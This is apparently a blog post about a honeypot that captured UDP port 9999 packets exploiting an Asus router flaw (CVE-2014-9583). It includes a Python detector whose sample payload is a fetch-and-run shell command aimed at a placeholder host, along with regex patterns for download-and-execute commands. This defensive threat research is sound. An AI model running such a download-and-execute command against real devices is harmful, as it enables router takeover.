This all started because I was bored and looking for something to do. Really.
One weekend in June I set up a honeypot, simply an Ubuntu Linux system running Apache, with full packet capture running under tcpdump. I was expecting to capture Shellshock exploitation against the web server. So one of the first things I did was to look for the string wget, which would indicate that a hacker was attempting to break into a computer (my decoy honeypot) and was instructing it to download a larger, more complex program. I found wget all right, but not in the place I expected.
This network packet started everything. A packet to UDP port 9999 with an embedded shell script, instructing the computer to use wget to download a file, and run it. It is not appropriate for one computer on the Internet to tell another computer what to do, sending a command out of nowhere. There is no authentication. So right away, I knew I had something “bad”. But what?
It was clear, from the presence of the rm and other clues, that the target of the command was a Unix system. I soon discovered that some Asus routers, like the routers used in homes and small offices, listened on UDP port 9999. These routers often run a version of the Linux operating system. And there was a vulnerability and an exploit, documented by Friedrich Postelstorfer and Joshua “jduck” Drake. The vulnerability had industry number CVE-2014-9583 and could let an unauthorized person take over an unpatched Asus router.
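One way to automate the kind of search described above (looking through captured UDP traffic for a payload that tells the receiver to fetch a file and run it), as an added example that is not part of the original post: a small Python script that parses raw IPv4/UDP datagrams and flags the download-and-execute pattern, with extra weight on UDP/9999. The sample frames, the watched-port set, the host placeholder.invalid and every function name are constructed here for illustration; the payload is a generic stand-in for the pattern, not the packet the author captured.

```python
import re
import socket
import struct
from typing import Dict, List, Optional

# UDP ports worth a closer look; 9999 is the port the post describes.
WATCHED_UDP_PORTS = {9999}

# "Fetch something" and "run something" fragments inside a payload.
DOWNLOAD_RE = re.compile(rb"\b(wget|curl|tftp)\b[^;\n|]*", re.IGNORECASE)
EXEC_RE = re.compile(rb"(chmod\s+\+?x\b|\bsh\s+[\w./-]+|(?:^|[;\s])\./[\w.-]+)", re.IGNORECASE)


def build_ipv4_udp(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Build a minimal IPv4+UDP datagram (checksums left at zero; enough for offline parsing)."""
    udp_len = 8 + len(payload)
    udp = struct.pack("!HHHH", sport, dport, udp_len, 0) + payload
    ip = struct.pack(
        "!BBHHHBBH4s4s",
        0x45, 0, 20 + udp_len, 0, 0, 64, 17, 0,
        socket.inet_aton(src), socket.inet_aton(dst),
    )
    return ip + udp


def parse_ipv4_udp(frame: bytes) -> Optional[Dict]:
    """Return addresses, ports and payload for an IPv4/UDP datagram, or None for anything else."""
    if len(frame) < 20 or frame[0] >> 4 != 4:
        return None
    ihl = (frame[0] & 0x0F) * 4
    if frame[9] != 17 or len(frame) < ihl + 8:  # protocol 17 = UDP
        return None
    sport, dport, udp_len, _chk = struct.unpack("!HHHH", frame[ihl:ihl + 8])
    return {
        "src": socket.inet_ntoa(frame[12:16]),
        "dst": socket.inet_ntoa(frame[16:20]),
        "sport": sport,
        "dport": dport,
        "payload": frame[ihl + 8:ihl + udp_len],
    }


def inspect(frame: bytes) -> Optional[Dict]:
    """Flag a datagram that carries a download-and-run instruction.

    A payload is flagged when it contains a fetch fragment together with either an
    execute fragment or a destination on a watched port. Returns a finding dict or None.
    """
    pkt = parse_ipv4_udp(frame)
    if pkt is None:
        return None
    fetch = DOWNLOAD_RE.search(pkt["payload"])
    run = EXEC_RE.search(pkt["payload"])
    watched = pkt["dport"] in WATCHED_UDP_PORTS
    if not fetch or not (run or watched):
        return None
    reasons = ["fetch:" + fetch.group(0).decode("ascii", "replace").strip()]
    if run:
        reasons.append("execute")
    if watched:
        reasons.append("udp/%d" % pkt["dport"])
    return {"src": pkt["src"], "dst": pkt["dst"], "dport": pkt["dport"], "reasons": reasons}


def scan(frames: List[bytes]) -> List[Dict]:
    """Run inspect() over raw frames and keep only the findings."""
    return [f for f in (inspect(fr) for fr in frames) if f is not None]


# Constructed samples (not captured traffic): one download-and-run command aimed at
# UDP/9999, and one ordinary-looking UDP datagram to port 53 that should stay quiet.
SAMPLES = {
    "suspicious": build_ipv4_udp(
        "198.51.100.7", "192.0.2.10", 40000, 9999,
        b"cd /tmp; wget http://placeholder.invalid/payload -O p; chmod +x p; ./p\n",
    ),
    "benign": build_ipv4_udp(
        "192.0.2.10", "192.0.2.1", 50000, 53,
        b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x07example\x03com\x00\x00\x01\x00\x01",
    ),
}

if __name__ == "__main__":
    for finding in scan(list(SAMPLES.values())):
        print(finding)
```

To use this on a real capture, feed it the IP layer of each packet (strip the Ethernet header first); the two regexes are deliberately narrow so that a plain HTTP download in the payload of an unrelated protocol does not trip the rule on its own.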
So, one IP address attempts to break into another system on the Internet, first using a backdoor into Linksys hardware, then a few minutes later using a backdoor into Asus hardware. Some searching did not find public discussion of this tactic.
At this point I was thrilled and was eager to chase this threat. The instruction in the Asus exploit directed the would-be victim to download another program and run it. I tried to download the program in the same way, but the downloads were never successful. As I continued to capture exploitation attempts from multiple IP addresses around the world, I knew I would have to get smarter.
To be continued in chapter 2…